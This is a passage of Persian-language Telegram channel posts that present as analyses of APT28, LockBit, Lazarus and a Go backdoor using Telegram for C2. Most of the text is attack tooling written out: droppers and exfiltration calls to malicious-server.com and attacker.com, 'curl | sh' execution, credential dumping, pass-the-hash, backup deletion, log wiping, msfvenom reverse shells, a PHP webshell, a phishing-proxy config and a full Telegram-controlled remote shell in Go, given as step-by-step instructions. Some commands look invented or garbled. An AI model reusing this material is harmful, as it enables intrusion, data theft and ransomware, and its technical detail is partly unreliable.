بعد از سرقت اعتبارنامه‌ها، اعضای گروه تونستن به حساب‌های ایمیل کارمندای DNC دسترسی پیدا کنن. اما این آخر کار نبود؛ برای کنترل گسترده‌تر، APT28 نیاز داشته که کنترل سیستم‌های داخلی DNC رو هم در اختیار بگیره. به همین خاطر اونا بدافزار X-Agent رو مستقر می‌کردن.
✅ استقرار X-Agent
👈 مراحل حمله پس از ورود به سیستم‌ها:
⬅️ 1- اعضای گروه از طریق VPN داخلی DNC یا پروتکل IMAP به ایمیل‌ها متصل می‌شدن.
⬅️ 2- بدافزار X-Agent رو روی سیستم‌های آلوده نصب می‌کردن.
👈 استقرار بدافزار از طریق PowerShell
بدافزار X-Agent با استفاده از PowerShell و رجیستری ویندوز به صورت مخفی اجرا می‌شده.
⬅️ یک. PowerShell Dropper برای دانلود و اجرای بدافزار:

$wc = New-Object System.Net.WebClient
$url = "https://malicious-server.com/xagent.exe"
$path = "$env:APPDATA\chrome_update.exe"
$wc.DownloadFile($url, $path)
Start-Process -FilePath $path -WindowStyle Hidden

⬅️ دو. Persistency تو ویندوز از طریق رجیستری:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_update /t REG_SZ /d C:\Users\Public\chrome_update.exe

👈 ویژگی‌های بدافزار X-Agent
⬅️ یک. Keylogging – ثبت کلیدهای فشرده‌شده توسط کاربر
⬅️ دو. سرقت فایل‌ها – ارسال اسناد حساس به سرور C2
⬅️ سه. گرفتن اسکرین‌شات – تصویربرداری از دسکتاپ قربانی
⬅️ چهار. اجرای دستورات از راه دور (Remote Command Execution)
👈 مثال ارتباط X-Agent با سرور C2:

POST /command.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

cmd=upload&file=/Users/Admin/Documents/confidential.pdf

🔹مرحله 3: حرکت جانبی (Lateral Movement) تو شبکه
چطور اعضای گروه تونستن کل شبکه DNC رو آلوده کنن؟
👈بعد از دسترسی به اولین سیستم، APT28 نیاز داشته به سیستم‌های دیگه هم نفوذ کنه. اونا این کار رو با استفاده از:
⬅️ یک. Credential Dumping با Mimikatz
⬅️ دو. Pass-the-Hash (PTH) برای ورود به سیستم‌های دیگه
⬅️سه. Pivoting برای دسترسی به منابع مهم
👈حرکت جانبی تو شبکه
⬅️ اجرای Mimikatz برای استخراج پسورد کارمندای DNC

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

⬅️ اجرای Pass-the-Hash برای ورود به سایر سیستم‌ها

psexec \\target-system -u administrator -p NTLMHASH cmd.exe

اجرای Pivoting با PowerShell Empire

Invoke-PsExec -ComputerName target-system -Command "net user /add hacker P@ssw0rd"

🔹مرحله 4: استخراج دیتاها و انتقال به سرور گروه APT28
چطور اطلاعات سرقت‌شده رو به بیرون ارسال کردن؟
گروه APT28 اطلاعات سرقت‌شده رو از طریق پروتکل HTTPS رمزگذاری‌شده و DNS Tunneling به سرورهای خودش ارسال می‌کرده.
👈روش‌های استخراج دیتاها
⬅️ ارسال اطلاعات با استفاده از PowerShell و HTTPS

$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

⬅️ اجرای DNS Tunneling برای ارسال دیتا بدون شناسایی

nslookup -type=TXT a1b2c3d4.example.com

⬅️ استفاده از Zip + XOR Encoding برای مخفی‌سازی دیتاها

zip -e stolen_data.zip confidential.pdf
cat stolen_data.zip | xor 0x55 > encoded_data.dat
curl -X POST --data-binary @encoded_data.dat https://malicious-server.com/upload

🔹نتیجه نهایی: تأثیر و پیامدهای این حمله
✅ اعضای گروه موفق به سرقت و افشای هزاران ایمیل محرمانه از مقامات DNC شدن.
✅ اطلاعات منتشرشده توسط WikiLeaks باعث جنجال سیاسی تو آمریکا شد.
✅ این حمله تأثیر قابل توجهی روی انتخابات 2016 آمریکا گذاشت.

🔹جمع‌بندی تاکتیک‌های APT28
✅فیشینگ هدفمند با صفحات لاگین جعلی
✅نصب بدافزار X-Agent برای کنترل کامل سیستم‌ها
✅حرکت جانبی با استفاده از Mimikatz و Pass-the-Hash
✅استخراج اطلاعات از طریق HTTPS و DNS Tunneling

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو سه: حمله به ناتو با بدافزار Komplex (macOS Exploit)
👈 مقدمه: چرا این حمله مهم بود؟
گروه APT28 یکی از معدود گروه‌هاییه که به‌طور خاص سیستم‌عامل macOS رو هدف قرار داده. تو حمله‌ای که علیه ناتو و سازمان‌های مرتبط با اون انجام شد، اونا از بدافزار Komplex برای نفوذ و سرقت اطلاعات استفاده کردن.

🔹 مرحله 1: نفوذ اولیه با استفاده از PDF آلوده
👈 نحوه ساخت فایل PDF آلوده
این گروه یه PDF آلوده رو طراحی کرد که از یک حمله‌ی Exploit-Based بهره‌ ببره.
⬅️ساختار حمله تو فایل PDF:
فایل شامل یه اسکریپت JS مخربه که از یه آسیب‌پذیری تو Adobe Reader استفاده می‌کرده. این اسکریپت باعث اجرای کد مخرب تو سطح سیستم‌عامل macOS شده.
⬅️ نمونه‌کد جاوا اسکریپت مخرب داخل PDF

this.submitForm("file:///System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister");

⬅️ اجرای دستور تو macOS برای دانلود بدافزار

system("/usr/bin/curl -o /tmp/update http://malicious-server.com/malware");
system("chmod +x /tmp/update; /tmp/update");

این کد از curl برای دانلود بدافزار و از chmod برای اجرای اون استفاده می‌کنه.

🔹 مرحله 2: نصب و اجرای بدافزار Komplex
👈 روش‌های استقرار بدافزار
⬅️ ایجاد Persistency تو macOS

mkdir -p ~/Library/LaunchAgents
echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.Komplex</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Users/victim/.Komplex/Komplex</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apple.Komplex.plist

این فایل Launch Agent تو macOS باعث می‌شه که بدافزار به‌طور خودکار تو هر بار بوت اجرا بشه.
⬅️ روش دیگه: تغییر تو ~/.bash_profile برای اجرای مخفیانه

echo "/Users/victim/.Komplex/Komplex &" >> ~/.bash_profile

🔹 مرحله 3: ارتباط با سرور C2 و اجرای دستورات از راه دور
👈 نحوه ارتباط با سرور C2
⬅️ ارتباط رمزگذاری‌شده با C2

POST /connect HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

cmd=upload&file=/Users/Admin/Documents/confidential.pdf

⬅️ دریافت دستورات از C2

curl -s https://malicious-server.com/command | sh

این دستور هر بار از سرور یه اسکریپت جدید دریافت و اجرا می‌کنه.
⬅️ دریافت لیست فایل‌ها و ارسال اون به سرور

ls -la ~/Documents/ > /tmp/list.txt
curl -X POST --data-binary @/tmp/list.txt https://malicious-server.com/upload

🔹 مرحله 4: حرکت جانبی در شبکه و استخراج اطلاعات
👈 حرکت جانبی (Lateral Movement)
⬅️ سرقت پسوردهای ذخیره‌شده تو Keychain macOS

security find-generic-password -ga "WiFi" | grep "password"

⬅️ استفاده از SSH برای گسترش حمله

ssh user@target-system "curl -s https://malicious-server.com/komplex | bash"

🔹 مرحله 5: استخراج دیتاها و حذف ردپاها
👈 ارسال اطلاعات به سرور مهاجم
⬅️ فشرده‌سازی و رمزگذاری اطلاعات قبل از ارسال

tar -czvf confidential.tar.gz ~/Documents/
openssl enc -aes-256-cbc -salt -in confidential.tar.gz -out encrypted_data.enc -k StrongPassword
curl -X POST --data-binary @encrypted_data.enc https://malicious-server.com/upload

⬅️ حذف ردپاها برای جلوگیری از شناسایی

rm -rf ~/.bash_history
rm -rf /tmp/list.txt

🔹 جمع‌بندی تاکتیک‌های پیشرفته‌ی APT28 در این حمله
✅ استفاده از PDF آلوده برای اجرای کد از راه دور تو macOS
✅ ایجاد Persistency از طریق Launch Agent و Bash Profile
✅ ارتباط رمزگذاری‌شده با سرور C2 برای دریافت دستورات
✅ حرکت جانبی با SSH و سرقت اطلاعات Keychain
✅ استفاده از AES برای رمزگذاری دیتاها قبل از استخراج

🔹 این حمله نشون داد که macOS به‌اندازه‌ ویندوز در برابر APT‌ها آسیب‌پذیره و APT28 یکی از معدود گروه‌هاییه که حملات پیچیده‌ی اختصاصی برای macOS طراحی می‌کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

سلام دوستان عزیز.
برای اینکه محتوای این کانال ادامه‌دار و همچنین گسترده‌تر بشه، دنبال جمع‌کردن یه تیم برای تولید محتوای تخصصی (بحث آموزشی نیست بلکه تحلیلی و انتقال تجربه‌اس) هستم. اگه:
۱. اگه تو حوزه امنیت دارین فعالیت می‌کنین
۲. وقت و حوصله دارین
۳. ایده برای تولید محتوا دارین
۴. می‌خواین رو پرسونال برندینگ‌تون کار کنین
به آی‌دی من (@vahid_elmi) پیام بدین تا بیشتر باهم صحبت کنیم.
نکته: هیچ پلن درآمد مستقیمی روی این کانال وجود نداره و هر محتوایی که تولید بشه رایگان تو دسترس عموم قرار می‌گیره.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚙️ تحلیل حمله LockBit به شرکت صنایع خودروسازی – نفوذ از طریق VPN ناامن

🔹 مقدمه:
لاک‌بیت یکی از پیچیده‌ترین گروه‌های باج‌افزاریه که تاکتیک‌های پیشرفته‌ای رو برای نفوذ، رمزگذاری، و اخاذی از سازمان‌ها پیاده‌سازی می‌کنه. تو یکی از حملاتی که این گروه انجام داده، اونا تونستن از طریق یه VPN ناامن به شبکه‌ی یه شرکت خودروسازی صنعتی نفوذ کنن. تو این حمله، اونا به خطوط تولید، دیتابیس تأمین‌کنندگان و مستندات محرمانه‌ی طراحی خودروها دسترسی پیدا کردن و در نهایت با رمزگذاری گسترده سیستم‌ها، از قربانی درخواست باج کردن.

🔹 فاز 1: دسترسی اولیه – سواستفاده از آسیب‌پذیری تو VPN
👈 چرا VPN نقطه‌ی ضعف شد؟
⬅️ شرکت خودروسازی از Fortinet VPN استفاده می‌کرد که آپدیت نشده بود.
⬅️ این VPN حاوی آسیب‌پذیری CVE-2020-12812 بود که به هکرها اجازه می‌داد بدون نیاز به احراز هویت دو مرحله‌ای (MFA Bypass) به شبکه وصل بشن.
⬅️ هکرها ابتدا با سرچ تو اینترنت و دارک‌وب یه لیستی از شرکت‌هایی که از این VPN استفاده می‌کردن رو به‌دست آوردن.
👈 شناسایی و سواستفاده از VPN آسیب‌پذیر
⬅️ گام 1: شناسایی دامنه‌ی شرکت خودروسازی

subfinder -d company-auto.com -o subdomains.txt

ابزار subfinder برای پیداکردن ساب‌دومین‌های فعال، از جمله vpn.company-auto.com استفاده شد.
⬅️ گام 2: اسکن پورت‌های باز برای پیدا کردن سرویس VPN

nmap -p 443 --noscript sslvpn-fortigate.nse vpn.company-auto.com

این دستور نشون می‌داد که Fortinet VPN روی پورت 443 در حال اجراست.
⬅️ گام 3: بررسی آسیب‌پذیری Fortinet CVE-2020-12812

python fortinet-exploit.py --target vpn.company-auto.com

اسکریپت به هکرها اجازه می‌داد تا بدون نیاز به MFA وارد بشن.
⬅️ گام 4: دسترسی به شبکه‌ی داخلی با استفاده از VPN

openvpn --config company-vpn.ovpn --auth-user-pass creds.txt

پس از به‌دست آوردن دسترسی، هکرها وارد شبکه‌ی داخلی سازمان شدن.

🔹 فاز 2: شناسایی و حرکت جانبی (Lateral Movement)
👈 گسترش نفوذ تو شبکه
⬅️ گام 1: شناسایی دامنه‌ی Active Directory

nltest /dclist:company-auto.com

لیست سرورهای Domain Controllers مشخص شدن.
⬅️ گام 2: استخراج اطلاعات کاربران با LDAP

Get-ADUser -Filter * -Properties Name,Email,LastLogonDate

این دستور لیستی از حساب‌های کاربری رو نمایش می‌داد.
⬅️ گام 3: اجرای Mimikatz برای سرقت اطلاعات لاگین

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

این ابزار اطلاعات حساب‌های مدیر شبکه رو استخراج می‌کرد.
⬅️ گام 4: استفاده از Pass-the-Hash برای ورود به سرور تولید

psexec \\production-server -u administrator -p NTLMHASH cmd.exe

حالا هکرها کنترل سرورهای تولید خودرو رو در اختیار داشتن.

🔹 فاز 3: رمزگذاری سیستم‌ها و خرابکاری صنعتی
👈 اجرای باج‌افزار LockBit تو کل شبکه
⬅️ گام 1: غیرفعال‌سازی ابزارهای امنیتی

Set-MpPreference -DisableRealtimeMonitoring $true

آنتی‌ویروس ویندوز خاموش شد.
⬅️ گام 2: حذف نسخه‌های پشتیبان برای جلوگیری از بازیابی

vssadmin delete shadows /all /quiet

تمام نسخه‌های بکاپ حذف شد.
⬅️ گام 3: اجرای LockBit تو تموم سیستم‌های شبکه با Group Policy

Invoke-Command -ComputerName * -ScriptBlock { Start-Process "C:\Windows\System32\lockbit.exe" }

این دستور باج‌افزار رو روی تموم کامپیوترهای دامین اجرا می‌کرد.
⬅️ گام 4: قفل کردن دیتابیس‌ها با رمزگذاری SQL Server

EXEC xp_cmdshell 'LockBit-Encrypt.exe -path C:\SQL-Data\'

تمام اطلاعات تأمین‌کنندگان قفل شد.
⬅️ گام 5: تغییر پارامترهای سیستم‌های کنترل صنعتی (ICS) برای خرابکاری تولید

MODBUS_WRITE -slave 1 -register 40001 -value 9999

دیتاهای کنترل‌کننده‌های PLC تو خط تولید تغییر داده شد.

🔹 فاز 4: سرقت و افشای دیتاها (Double Extortion)
👈 استخراج دیتاهای محرمانه
⬅️ گام 1: استخراج اطلاعات طراحی خودروها

Get-ChildItem "C:\Designs\Confidential" -Recurse | Compress-Archive -DestinationPath C:\Temp\designs.zip

⬅️ گام 2: ارسال دیتاها به سرور مهاجمین

scp /Temp/designs.zip attacker@malicious-server:/data/

⬅️ گام 3: تهدید شرکت برای پرداخت باج:

Your company has been hacked by LockBit.
All your data is encrypted and stolen.
Pay 30 BTC or we will leak your secret designs.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تشریح حمله هکرهای کره شمالی به دولوپرای فریلنسر (قسمت اول)

تو دو سه روز گذشته خبری منتشر شده که هکرهای منتسب به کره شمالی، دولوپرای فریلنسر رو مورد هدف قرار دادن. این گروه‌ها و به ویژه لازاروس، اخیراً دولوپرای فریلنسری رو از طریق آفرهای شغلی فیک هدف قرار داده‌ان تا بدافزارها رو تو سیستم‌های اونا مستقر کنن. این حملات با استفاده از تکنیک‌های مهندسی اجتماعی، اکسپلویت‌های زیرودی، فیشینگ و بدافزارهای مخفی انجام می‌شن. این حمله رو تو دو قسمت و 5 مرحله باهم بررسی می‌کنیم:
⬅️ مرحله ۱: شناسایی و انتخاب قربانی
⬅️ مرحله ۲: ارسال پیشنهاد شغلی فیک و فیشینگ
⬅️ مرحله ۳: استقرار بدافزار و اکسپلویت
⬅️ مرحله ۴: استخراج اطلاعات و حفظ دسترسی
⬅️ مرحله ۵: حذف ردپاها و خروج از سیستم

🔹 مرحله ۱: شناسایی و انتخاب قربانی
👈 روش‌های شناسایی دولوپرا
هکرهای کره شمالی از ابزارهای OSINT برای جمع‌آوری اطلاعات در مورد دولوپرای فریلنسر و برنامه‌نویسایی که تو شرکت‌های بزرگ فناوری کار می‌کنن، استفاده می‌کنن.
👈 ابزارهای استفاده‌شده تو این مرحله:
⬅️ یک. theHarvester (برای جمع‌آوری ایمیل و اطلاعات شبکه‌های اجتماعی)
⬅️ دو. SpiderFoot (برای اسکن داده‌های عمومی)
⬅️ سه. Maltego (برای ایجاد ارتباط بین افراد و سازمان‌ها)
👈 دستورات OSINT برای شناسایی ایمیل و اطلاعات عمومی یه دولوپر:

theHarvester -d example.com -b linkedin
spiderfoot -s example.com -m social

👈 مهم‌ترین ری‌سورس برای شناسایی اهداف:
⬅️ لینکدین: پیدا کردن دولوپرای فعال تو پروژه‌های حساس
⬅️ گیت‌هاب و Stack Overflow: بررسی ریپازیتوری کدهای فریلنسری و پروژه‌های مرتبط
⬅️ فریلسنر، Upwork، Fiverr: ارتباط با فریلنسرها و ارسال پیشنهادهای کاری فیک

🔹 مرحله ۲: ارسال پیشنهاد شغلی جعلی و فیشینگ
هکرها یه پروفایل فیک از شرکت‌های معتبر ایجاد کرده و از طریق ایمیل، لینکدین یا پلتفرم‌های فریلنسری به دولوپرا پیشنهاد کار می‌دن.
👈 روش ۱: ایمیل فیشینگ (Spear Phishing)
⬅️ ارسال یه ایمیل فیک از طرف شرکت‌های معروف مثل Google، Microsoft یا Tesla
⬅️ ایمیل حاوی لینک به سایت‌های جعلی لاگین یا فایل‌های آلوده (PDF, DOCX, ZIP) است.
👈 نمونه ایمیل فیشینگ استفاده‌شده تو این حمله:

From: hr@google-careers.com
To: developer@example.com
Subject: Exciting Job Opportunity - Senior Software Engineer

Hello [Developer Name],

We have reviewed your GitHub projects and believe you would be a great fit for our new AI initiative at Google. Please find the attached job denoscription and coding test.

Best regards,
Google HR Team

👈 روش ۲: آزمون برنامه‌نویسی آلوده
⬅️ از تارگت خواسته می‌شه یه تست کدنویسی رو دانلود و اجرا کنه.
⬅️ فایل حاوی اسکریپت‌های مخربه که بعد از اجرا دسترسی ریموت رو برای مهاجم باز می‌کنه.
نمونه‌ای از کد مخرب تو آزمون کدنویسی (Python):

import os
import requests

# دریافت کدهای مخرب از سرور هکر
payload = requests.get("http://attacker.com/malware.py").text
exec(payload)  # اجرای کد مخرب

👈 روش ۳: ارسال آفر شغلی تو لینکدین با لینک مخرب
⬅️ ارسال لینک‌هایی که تارگت رو به یه صفحه جعلی لاگین GitHub یا Outlook هدایت می‌کنن.
⬅️ حمله Evilginx2 برای سرقت کوکی‌های احراز هویت (Session Hijacking)
👈کانفیگ Evilginx2 برای حمله فیشینگ به گیت‌هاب:

config domain attacker.com
phishlets enable github
phishlets hostname github.attacker.com
lures create github
lures edit 0 set url https://github.com/login
lures get-url 0

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تشریح حمله هکرهای کره شمالی به دولوپرای فریلنسر (قسمت دوم)

🔹 مرحله ۳: استقرار بدافزار و اکسپلویت (Exploitation & Malware Deployment)
روش‌های استقرار بدافزار
👈 یک. ماکروهای مخرب تو فایل‌های آفیس
هکرها فایل‌های ورد یا اکسل حاوی ماکروهای مخرب ارسال می‌کنن. وقتی که تارگت ماکرو رو فعال کنه، یه بدافزار دانلود و اجرا می‌شه.
کد VBA مخرب تو فایل ورد برای دانلود بدافزار:

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub

👈 دو. پیلود مخرب با استفاده از Metasploit
⬅️ تولید فایل مخرب با msfvenom

msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > job_offer.exe

⬅️ اجرای اکسپلویت تو Metasploit

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST attacker.com
set LPORT 443
run

👈 سه. سرقت اطلاعات با استفاده از Mimikatz
بعد از دسترسی به سیستم، سرقت هش‌های NTLM برای حرکت جانبی تو شبکه:

mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

🔹 مرحله ۴: استخراج اطلاعات و حفظ دسترسی (Persistence & Data Exfiltration)
👈 یک. سرقت کوکی‌های احراز هویت برای دسترسی پایدار

sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"

👈 دو. استفاده از DNS Tunneling برای استخراج دیتاها

dnscat2 --dns attacker.com

👈 سه. برقراری ارتباط پایدار با سرور هکر با پاورشل

$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.docx")

🔹 مرحله ۵: حذف ردپاها و خروج از سیستم (Covering Tracks & Cleanup)
👈 یک. پاک‌سازی لاگ‌های ویندوز

wevtutil cl System
wevtutil cl Security
wevtutil cl Application

👈 دو. حذف تاریخچه اجرا تو پاورشل

Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

👈 سه. پاک کردن فایل‌های ایجادشده تو سیستم

del /F /Q /S C:\Users\Public\malware.exe

🔹 روش‌های دفاعی پیشنهادی
⬅️ فعال‌سازی احراز هویت چندمرحله‌ای (MFA)
⬅️ عدم دانلود و اجرای فایل‌های ناشناس از منابع غیرمعتبر
⬅️ اجرای کدهای ناشناس تو محیط‌های ایزوله (Sandbox)
⬅️ استفاده از ابزارهای EDR/XDR برای شناسایی تهدیدات پیشرفته
⬅️ بررسی دقیق پیشنهادهای شغلی قبل از تعامل با ارسال‌کننده

🔹 نتیجه‌گیری
این حمله نشون می‌ده که هکرهای کره شمالی از روش‌های پیشرفته‌ی فریب و بدافزارهای پیچیده برای سرقت اطلاعات و ایجاد نفوذهای بلندمدت تو سیستم‌ها استفاده می‌کنن. دولوپرا و فریلنسرها باید بیشتر از همیشه نسبت به حملات فیشینگ و پیشنهادهای شغلی مشکوک هوشیار باشن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت اول)

تو چن روز گذشته، محققای امنیت سایبری یه بکدور جدید مبتنی بر زبان برنامه‌نویسی Go (Golang) رو شناسایی کردن که از API ربات تلگرام برای برقراری ارتباطاتC2 استفاده می‌کنه. تو این پست می‌خوایم کمی این مورد رو بررسی فنی‌تر انجام بدیم که این تحلیل شامل راه‌اندازی سرور C2 با استفاده از تلگرام، روش‌های دور زدن شناسایی، و ابزارهای مورد استفاده تو این حمله‌اس.

🔹 یک. راه‌اندازی سرور C2 با استفاده از تلگرام
برای استفاده از API تلگرام به عنوان مرکز C2، باید مراحل زیر رو طی کنیم:
👈 مرحله ۱: ایجاد یک ربات تلگرام
⬅️ الف. به تلگرام رفته و @BotFather رو جستجو کنین.
⬅️ ب. دستور /newbot رو ارسال کنین.
⬅️ ج. نام و نام کاربری ربات رو تنظیم کنین.
⬅️ د. توکن دریافت‌شده رو ذخیره کنین. این توکن برای برقراری ارتباط استفاده می‌شه.
👈 مرحله ۲: دریافت و ارسال دستورات با Golang
برای تعامل با API تلگرام، از لایبرری github.com/go-telegram-bot-api/telegram-bot-api استفاده می‌کنیم.
نمونه کد برای دریافت دستورات از تلگرام و اجرای اونا تو سیستم قربانی:

package main

import (
    "log"
    "os/exec"
    "github.com/go-telegram-bot-api/telegram-bot-api"
)

func main() {
    bot, err := tgbotapi.NewBotAPI("YOUR_BOT_TOKEN")
    if err != nil {
        log.Fatal(err)
    }

    u := tgbotapi.NewUpdate(0)
    u.Timeout = 60
    updates, err := bot.GetUpdatesChan(u)

    for update := range updates {
        if update.Message == nil {
            continue
        }

        cmd := update.Message.Text
        output, err := exec.Command("sh", "-c", cmd).Output()
        if err != nil {
            output = []byte(err.Error())
        }

        msg := tgbotapi.NewMessage(update.Message.Chat.ID, string(output))
        bot.Send(msg)
    }
}

این کد پیام‌های دریافتی از ربات تلگرام رو پردازش می‌کنه. هر پیام به عنوان یه دستور سیستم اجرا شده و خروجی اون به مهاجم ارسال می‌شه.

🔹 دو. پنهان‌سازی و جلوگیری از شناسایی
برای افزایش شانس اجرای موفقیت‌آمیز، چندین تکنیک دور زدن شناسایی به کار گرفته می‌شه.
👈 الف) مبهم‌سازی کد (Obfuscation)
⬅️ ابزار garble برای مبهم‌سازی باینری Golang

GOOS=linux GOARCH=amd64 garble -literals build -o payload obfuscated.go

👈 ب) اجرای بدافزار به صورت سرویس مخفی
⬅️ تبدیل بدافزار به یه سرویس پس‌زمینه تو لینوکس:

cp payload /usr/bin/systemd-networkd
chmod +x /usr/bin/systemd-networkd
echo '[Service]
ExecStart=/usr/bin/systemd-networkd
Restart=always' > /etc/systemd/system/networkd.service
systemctl enable networkd
systemctl start networkd

تو ویندوز، می‌شه از schtasks برای ایجاد یه تسک مخفی استفاده کرد:

schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\malware.exe" /sc onlogon /ru SYSTEM /f

🔹 سه. استفاده از ngrok برای دسترسی مستقیم
وقتی که نمی‌شه از تلگرام استفاده کرد، ngrok یه راه ارتباطی امن برای C2 فراهم می‌کنه.
👈 نصب ngrok

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken YOUR_AUTH_TOKEN

👈 ایجاد یه تانل مخفی برای ارتباط با بکدور:

./ngrok tcp 4444

بعد از اجرای این دستور، ngrok یک آدرس tcp:// ایجاد می‌کنه که مهاجم می‌تونه برای ارتباط استفاده کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت دوم)

🔹 چهار. پیلودها و اکسپلویت‌های مورد استفاده
👈 الف) اکسپلویت RCE
اگه دسترسی به سرور قربانی از طریق آسیب‌پذیری‌های تحت وب ممکن باشه، می‌شه یه webshell مستقر کرد:

<?php echo shell_exec($_GET['cmd']); ?>

این شل رو می‌شه با curl استفاده کرد:

curl "http://victim.com/shell.php?cmd=whoami"

👈 ب) سرریز بافر تو سرویس‌های ناامن
اگه سرویس‌های آسیب‌پذیر به سرریز بافر پیدا بشن، می‌شه از ابزار msfvenom برای ساخت پیلود استفاده کرد:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -f elf > payload.elf

و بعدش اونو تو سیستم هدف اجرا کرد:

chmod +x payload.elf
./payload.elf

🔹 پنج. نکات امنیتی برای جلوگیری از شناسایی و کشف
👈 الف) استفاده از رمزگذاری برای ارتباطات
برای جلوگیری از شناسایی، می‌شه از AES برای رمزگذاری ارتباطات استفاده کرد. نمونه کد رمزگذاری و رمزگشایی:

import (
    "crypto/aes"
    "crypto/cipher"
    "encoding/hex"
)

func encrypt(data, key string) string {
    block, _ := aes.NewCipher([]byte(key))
    ciphertext := make([]byte, len(data))
    stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
    stream.XORKeyStream(ciphertext, []byte(data))
    return hex.EncodeToString(ciphertext)
}

func decrypt(data, key string) string {
    ciphertext, _ := hex.DecodeString(data)
    block, _ := aes.NewCipher([]byte(key))
    plaintext := make([]byte, len(ciphertext))
    stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
    stream.XORKeyStream(plaintext, ciphertext)
    return string(plaintext)
}

👈 ب) استفاده از اجرای مخفی تو ویندوز
برای اجرای مخفی تو ویندوز، می‌شه از regsvr32 استفاده کرد:

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

این دستور باعث اجرای کد مخرب از طریق COM بدون ایجاد پردازش مشهود می‌شه.

🔹 نتیجه‌گیری
⬅️ استفاده از تلگرام به عنوان C2 راهی برای پنهان‌سازی ارتباطات بدافزاره.
⬅️ گولنگ به دلیل قابل حمل بودن و سختی دی‌کامپایل شدن، گزینه‌ای محبوب برای توسعه‌دهنده‌های بدافزار شده.
⬅️ استفاده از ngrok، msfvenom، و AES در کنار روش‌های مبهم‌سازی، شانس شناسایی و کشف رو کاهش می‌ده.

⚠️ نکته: این مقاله صرفاً برای اهداف آموزشی و امنیتی نوشته شده است. مسئولیت استفاده نادرست از این اطلاعات بر عهده کاربر خواهد بود.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar